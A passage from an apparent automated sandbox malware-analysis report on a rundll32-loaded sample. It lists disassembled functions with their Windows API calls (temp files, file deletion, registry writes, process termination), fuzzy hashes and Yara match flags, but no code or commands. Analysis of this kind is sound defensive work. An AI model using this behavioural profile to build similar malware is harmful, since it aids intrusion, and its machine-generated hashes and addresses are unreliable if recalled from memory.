                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                            • String ID:
                                            • API String ID: 3369646462-0
                                            • Opcode ID: 22cbf9af601d26ed4afbbf734961aedf1a808dd4b303ae4db7fa315fd33a3f19
                                            • Instruction ID: 4410a29c88b50175640e818b04fae76d1295143c691af284a142d4403d84b4fa
                                            • Opcode Fuzzy Hash: 22cbf9af601d26ed4afbbf734961aedf1a808dd4b303ae4db7fa315fd33a3f19
                                            • Instruction Fuzzy Hash: 2F3100B5900309FFDB20DFA5CC84E9EBBBCEB09314F144979DA02A2141D735AA499F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • lstrlen.KERNEL32(00000000,?,00000F00), ref: 058043F3
                                              • Part of subcall function 0580B865: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,05804417,?,00000000,000000FF,?,00000F00), ref: 0580B876
                                              • Part of subcall function 0580B865: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,05804417,?,00000000,000000FF,?,00000F00), ref: 0580B87D
                                              • Part of subcall function 0580B865: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0580B88F
                                              • Part of subcall function 0580B865: _snprintf.NTDLL ref: 0580B8B5
                                              • Part of subcall function 0580B865: _snprintf.NTDLL ref: 0580B8E9
                                              • Part of subcall function 0580B865: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0580B906
                                            • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 0580448D
                                            • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 058044AA
                                            • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 058044B2
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 058044C1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                            • String ID: s:
                                            • API String ID: 2960378068-2363032815
                                            • Opcode ID: 00aa372c36d7c90ac7b3562db572540140792c8ee3519421aa06461aa079fa5c
                                            • Instruction ID: a35ef651b996416a7ad863cbbd44322dbb3a527f2169ea8f4c1ed2d2499b0fc1
                                            • Opcode Fuzzy Hash: 00aa372c36d7c90ac7b3562db572540140792c8ee3519421aa06461aa079fa5c
                                            • Instruction Fuzzy Hash: BA314376A00215AFDF60EBE9CC89FDE7FACAF04211F004555FE05E2251EB7469448761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 058113E2
                                            • lstrcmpiW.KERNEL32(00000000,?), ref: 0581141A
                                            • lstrcmpiW.KERNEL32(?,?), ref: 0581142F
                                            • lstrlenW.KERNEL32(?), ref: 05811436
                                            • CloseHandle.KERNEL32(?), ref: 0581145E
                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0581148A
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 058114A8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                            • String ID:
                                            • API String ID: 1496873005-0
                                            • Opcode ID: 83c3d5b7f2e2df4dc9a634289d6d12901e4446267e50a9bf870f42ada98b20ed
                                            • Instruction ID: 1273f5a77e7171aca6dcea278f7baaeeb1c2e96f61173683251ea02f826feddb
                                            • Opcode Fuzzy Hash: 83c3d5b7f2e2df4dc9a634289d6d12901e4446267e50a9bf870f42ada98b20ed
                                            • Instruction Fuzzy Hash: 192119B1610309ABEB209FA5DC89EAA7FBDBF14641B048524FE02E2151DB35ED45CB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(05811B23,00000000,05829440,05829460,?,?,05811B23,0581C387,05829440), ref: 0581A816
                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0581A82C
                                            • lstrlen.KERNEL32(0581C387,?,?,05811B23,0581C387,05829440), ref: 0581A834
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0581A840
                                            • lstrcpy.KERNEL32(05829440,05811B23), ref: 0581A856
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,05811B23,0581C387,05829440), ref: 0581A8AA
                                            • HeapFree.KERNEL32(00000000,05829440,?,?,05811B23,0581C387,05829440), ref: 0581A8B9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                            • String ID:
                                            • API String ID: 1531811622-0
                                            • Opcode ID: 101096eb29e78678ac64dfd64bc9a97b2feb3eec6c5f83fbee62c53ba836f9b4
                                            • Instruction ID: 9ee1e7921b793ea7e34a04f46d9849fbc09f81db8a40c494d542d89f00bdff99
                                            • Opcode Fuzzy Hash: 101096eb29e78678ac64dfd64bc9a97b2feb3eec6c5f83fbee62c53ba836f9b4
                                            • Instruction Fuzzy Hash: E221C531104244BFEF224F68DC46FAA7FAAEB85210F148059FC4597251CF31AC46C7B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(00000000,?,?,?), ref: 05812CA8
                                              • Part of subcall function 058099C2: lstrcpy.KERNEL32(-000000FC,00000000), ref: 058099FC
                                              • Part of subcall function 058099C2: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 05809A0E
                                              • Part of subcall function 058099C2: GetTickCount.KERNEL32 ref: 05809A19
                                              • Part of subcall function 058099C2: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 05809A25
                                              • Part of subcall function 058099C2: lstrcpy.KERNEL32(00000000), ref: 05809A3F
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(00000000), ref: 05812CE3
                                            • wsprintfA.USER32 ref: 05812CF6
                                            • GetTickCount.KERNEL32 ref: 05812D0B
                                            • wsprintfA.USER32 ref: 05812D20
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                            • String ID: "%S"
                                            • API String ID: 1152860224-1359967185
                                            • Opcode ID: 54906165b60dd8a53f0e2a0625124b7ce23aa111babfc43f9ca874bae3537078
                                            • Instruction ID: bd3dd5b787239e2f5497434a5df5b2d6f09aff499a1423251db70b521223cfd6
                                            • Opcode Fuzzy Hash: 54906165b60dd8a53f0e2a0625124b7ce23aa111babfc43f9ca874bae3537078
                                            • Instruction Fuzzy Hash: BC11DF726063196FC6A0BBA9DC4CE6B7E9CEF85650B018419FD05D7240DE34EC408BB6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,00000000,000000B7,?,00000001,05807F67,00000000,00000000,00000011), ref: 058063B2
                                            • HeapFree.KERNEL32(00000000,00000000,00001ED2,00000000,000000B7,?,00000001,05807F67,00000000,00000000,00000011), ref: 05806425
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                            • String ID:
                                            • API String ID: 2078930461-0
                                            • Opcode ID: 4a560e6557c5165d7885d1e32114d0009feb48242a08ebc25831a2e080126c7a
                                            • Instruction ID: 0c0f424b45530469ddbde12faf77d1bcaba28e659868fa0a890d9e0f1eccce59
                                            • Opcode Fuzzy Hash: 4a560e6557c5165d7885d1e32114d0009feb48242a08ebc25831a2e080126c7a
                                            • Instruction Fuzzy Hash: D6110431241718BBD6B16A22AC8EFAB3E5CEB45761F008121FE02D51E1EA625C9486E6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581684C: lstrlen.KERNEL32(00000000,00000000,75BCC740,76CC81D0,?,?,?,0580A203,?,00000000,76CC81D0,?,?,0580ACCC,00000000,05D7C310), ref: 058168B3
                                              • Part of subcall function 0581684C: sprintf.NTDLL ref: 058168D4
                                            • lstrlen.KERNEL32(00000000,75BCC740,?,00000000,76CC81D0,?,?,0580ACCC,00000000,05D7C310), ref: 0580A215
                                            • lstrlen.KERNEL32(?,?,?,0580ACCC,00000000,05D7C310), ref: 0580A21D
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • strcpy.NTDLL ref: 0580A234
                                            • lstrcat.KERNEL32(00000000,?), ref: 0580A23F
                                              • Part of subcall function 05802644: lstrlen.KERNEL32(?,?,?), ref: 05802655
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • StrTrimA.SHLWAPI(00000000,=,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 0580A25C
                                              • Part of subcall function 0581E5A9: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0580A268,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 0581E5B3
                                              • Part of subcall function 0581E5A9: _snprintf.NTDLL ref: 0581E611
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                            • String ID: =
                                            • API String ID: 2864389247-1428090586
                                            • Opcode ID: df7988481fbc7e90b4cd9cb945af585f9f69e797c54d435e14f89c4fc62230dd
                                            • Instruction ID: cd43e9f427996856ca863bd90577c02b9608d5cead8c905574a4dc711d5c88a7
                                            • Opcode Fuzzy Hash: df7988481fbc7e90b4cd9cb945af585f9f69e797c54d435e14f89c4fc62230dd
                                            • Instruction Fuzzy Hash: 12110633B02324BB4A627BBC9C8DC6E3F9C9E896603049126FD01E7240DE35DC4147E6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SwitchToThread.KERNEL32(?,?,05813ED5), ref: 0581E88E
                                            • CloseHandle.KERNEL32(?,?,05813ED5), ref: 0581E89A
                                            • CloseHandle.KERNEL32(00000000,76CDF720,?,05804545,00000000,?,?,?,05813ED5), ref: 0581E8AC
                                            • memset.NTDLL ref: 0581E8C3
                                            • memset.NTDLL ref: 0581E8DA
                                            • memset.NTDLL ref: 0581E8F1
                                            • memset.NTDLL ref: 0581E908
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$CloseHandle$SwitchThread
                                            • String ID:
                                            • API String ID: 3699883640-0
                                            • Opcode ID: 947a2b4fa2955313ab83bc4ed69cb8a30f393f267ebde536ec42c3e251469e2a
                                            • Instruction ID: f31022a9baa8d6b008b9164af07f540e4e9d0fe0b2d8dd2e8e1c600628a16bd6
                                            • Opcode Fuzzy Hash: 947a2b4fa2955313ab83bc4ed69cb8a30f393f267ebde536ec42c3e251469e2a
                                            • Instruction Fuzzy Hash: FF11E371A5022067CA717B2DAC0AD9F7E6CFBD6700F048126FD15E7140DE24ADC58FAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058190C8
                                            • wcstombs.NTDLL ref: 058190D9
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810064
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,00000020,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810073
                                            • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 058190FA
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 05819109
                                            • CloseHandle.KERNEL32(00000000), ref: 05819110
                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0581911F
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0581912F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                            • String ID:
                                            • API String ID: 417118235-0
                                            • Opcode ID: f59c1f18e3b358ba7e4b01de8fcc0d474c27e1524113aa78337b16f26c24afdc
                                            • Instruction ID: e3ddb80a088184a112ad0b33ad9d5271ff966ac2163c5cce2c27207b19c90cd4
                                            • Opcode Fuzzy Hash: f59c1f18e3b358ba7e4b01de8fcc0d474c27e1524113aa78337b16f26c24afdc
                                            • Instruction Fuzzy Hash: CD119031200215FBEB216B65DC4EBAA7F6CFB04751F108010FD0696190DBB9ACD0CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • lstrcpy.KERNEL32(-000000FC,00000000), ref: 058099FC
                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 05809A0E
                                            • GetTickCount.KERNEL32 ref: 05809A19
                                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 05809A25
                                            • lstrcpy.KERNEL32(00000000), ref: 05809A3F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                            • String ID: \Low
                                            • API String ID: 1629304206-4112222293
                                            • Opcode ID: 44d43fcec9244f7374501816190564d74179b6aee91262d193d0c8057f08f9d9
                                            • Instruction ID: 679eec716147fdebc98d5609aac9ad839d6a1ce501cfe7f169d66c03ca054cc5
                                            • Opcode Fuzzy Hash: 44d43fcec9244f7374501816190564d74179b6aee91262d193d0c8057f08f9d9
                                            • Instruction Fuzzy Hash: 6F01D232305624ABDA706AB59C49F6BBF9CEF45651B055124FC01D31D1CF28ED4086B6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • wsprintfA.USER32 ref: 05813685
                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05813697
                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 058136C1
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 058136D4
                                            • CloseHandle.KERNEL32(?), ref: 058136DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                            • String ID: 0x%08X
                                            • API String ID: 603522830-3182613153
                                            • Opcode ID: 05d4bca0d968bae3a3d08d8f09b952562523c252a9a4d0d5066997d33081ae45
                                            • Instruction ID: 6d69b5cd3ff5e5f350ebac150424970c11dc0161738bab91d348fd756cdd20f1
                                            • Opcode Fuzzy Hash: 05d4bca0d968bae3a3d08d8f09b952562523c252a9a4d0d5066997d33081ae45
                                            • Instruction Fuzzy Hash: 3F0148B1904229ABDB10AB90DC0ADEEBF7CEF05260F008114B916E2290EB70A645CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetLastError.KERNEL32(?,?,?,00001000,?,05829314,76CDF750), ref: 05811E7E
                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,05829314,76CDF750), ref: 05811F03
                                            • CloseHandle.KERNEL32(00000000,?,05829314,76CDF750), ref: 05811F1D
                                            • OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,05829314,76CDF750), ref: 05811F52
                                              • Part of subcall function 0581012F: RtlReAllocateHeap.NTDLL(00000000,?,?,0580171E), ref: 0581013F
                                            • WaitForSingleObject.KERNEL32(?,00000064,?,05829314,76CDF750), ref: 05811FD4
                                            • CloseHandle.KERNEL32(F0FFC983,?,05829314,76CDF750), ref: 05811FFB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                            • String ID:
                                            • API String ID: 3115907006-0
                                            • Opcode ID: bbf6fce70aaaaeaba8d24a4d1f3368ff4133e04cb12ffa92daaa77ad5c8c3073
                                            • Instruction ID: 306367511cc1881ce26cff96a6e437453a5d617f92de2c1d36ea6e3af8773e9f
                                            • Opcode Fuzzy Hash: bbf6fce70aaaaeaba8d24a4d1f3368ff4133e04cb12ffa92daaa77ad5c8c3073
                                            • Instruction Fuzzy Hash: E5812871D00219EFDB11DF98C888AADBBB9FF08344F158459EE06EB250C731AD50CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 05809C55
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 05809C63
                                            • lstrlenW.KERNEL32(00000010), ref: 05809C73
                                            • lstrlenW.KERNEL32(00000218), ref: 05809C7F
                                            • FileTimeToLocalFileTime.KERNEL32(00000001,?), ref: 05809D6C
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 05809D7A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                                            • String ID:
                                            • API String ID: 1122361434-0
                                            • Opcode ID: 956e95fd12b329e406b2fee1d0992dacfa4874bdbe187ce0b5421d42363c969c
                                            • Instruction ID: 21ed8e65e5fb13131bd911bebc372d0b0a87680ff3ddb2478785b0451089063b
                                            • Opcode Fuzzy Hash: 956e95fd12b329e406b2fee1d0992dacfa4874bdbe187ce0b5421d42363c969c
                                            • Instruction Fuzzy Hash: F1710F71A00209ABCB60DBA9C884EFEBBFDBF08305F144466F945D7251E634A945DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805AB4
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?), ref: 05805B0F
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805B32
                                              • Part of subcall function 05805A14: wcscpy.NTDLL ref: 05805B44
                                            • WaitForSingleObject.KERNEL32(00000000,?,05D79998,?,00000000,00000000,00000001), ref: 0580ECB6
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0580ECF0
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 0580ED13
                                            • RegCloseKey.ADVAPI32(?), ref: 0580ED1C
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0580ED80
                                            • RtlExitUserThread.NTDLL(?), ref: 0580EDB6
                                              • Part of subcall function 058213BB: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0581A2F0,00000000,?,?), ref: 058213D9
                                              • Part of subcall function 058213BB: GetFileSize.KERNEL32(00000000,00000000,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 058213E9
                                              • Part of subcall function 058213BB: CloseHandle.KERNEL32(000000FF,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0582144B
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                              • Part of subcall function 05803486: GetLastError.KERNEL32 ref: 058034D0
                                              • Part of subcall function 05803486: WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                              • Part of subcall function 05803486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                              • Part of subcall function 05803486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                              • Part of subcall function 05803486: SetEndOfFile.KERNEL32(?), ref: 05803562
                                              • Part of subcall function 05803486: CloseHandle.KERNEL32(?), ref: 0580357A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
                                            • String ID:
                                            • API String ID: 90276831-0
                                            • Opcode ID: 6a86e36d7b7021a2a9db282cb0c90b66bdbad61b6d7a2ecf96c0b17f5f74f48e
                                            • Instruction ID: 3ad108e64afda13b4b3f4582e2a592e18380fa2428ce0895626c365f6f37dc49
                                            • Opcode Fuzzy Hash: 6a86e36d7b7021a2a9db282cb0c90b66bdbad61b6d7a2ecf96c0b17f5f74f48e
                                            • Instruction Fuzzy Hash: FE513DB1A10204AFEB64DF99CC8AEAA7FBDEB04310F004455FE04E7290DB75AE45CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlImageNtHeader.NTDLL(?), ref: 0581F99D
                                              • Part of subcall function 058065B6: lstrlenW.KERNEL32(00000000,76CDF560,00000000,?,00000000,?,?,05805512,00000020), ref: 058065E2
                                              • Part of subcall function 058065B6: RtlAllocateHeap.NTDLL(00000000,?), ref: 058065F4
                                              • Part of subcall function 058065B6: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05805512,00000020), ref: 05806611
                                              • Part of subcall function 058065B6: lstrlenW.KERNEL32(00000000,?,?,05805512,00000020), ref: 0580661D
                                              • Part of subcall function 058065B6: HeapFree.KERNEL32(00000000,00000000,?,?,05805512,00000020), ref: 05806631
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 0581F9D5
                                            • CloseHandle.KERNEL32(?), ref: 0581F9E3
                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0581FABC
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0581FACB
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0581FADE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                            • String ID:
                                            • API String ID: 1719504581-0
                                            • Opcode ID: a3c52f7033577c52981db5d79d4867daad322b340bc71edf2ddecffc583cd258
                                            • Instruction ID: f6a1d8809a708d7b339c4b01302bb94af868e1adc9c8469b5997eb7f07bf1881
                                            • Opcode Fuzzy Hash: a3c52f7033577c52981db5d79d4867daad322b340bc71edf2ddecffc583cd258
                                            • Instruction Fuzzy Hash: A9417E36700209ABDB21DFA5D889EAA7F7DBF44714F008025FE06D7250DB74AD84CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleA.KERNEL32(00000000,?), ref: 0581D513
                                            • GetLastError.KERNEL32 ref: 0581D539
                                            • SetEvent.KERNEL32(00000000), ref: 0581D54C
                                            • GetModuleHandleA.KERNEL32(00000000), ref: 0581D595
                                            • memset.NTDLL ref: 0581D5AA
                                            • RtlExitUserThread.NTDLL(?), ref: 0581D5DF
                                            Memory Dump Source
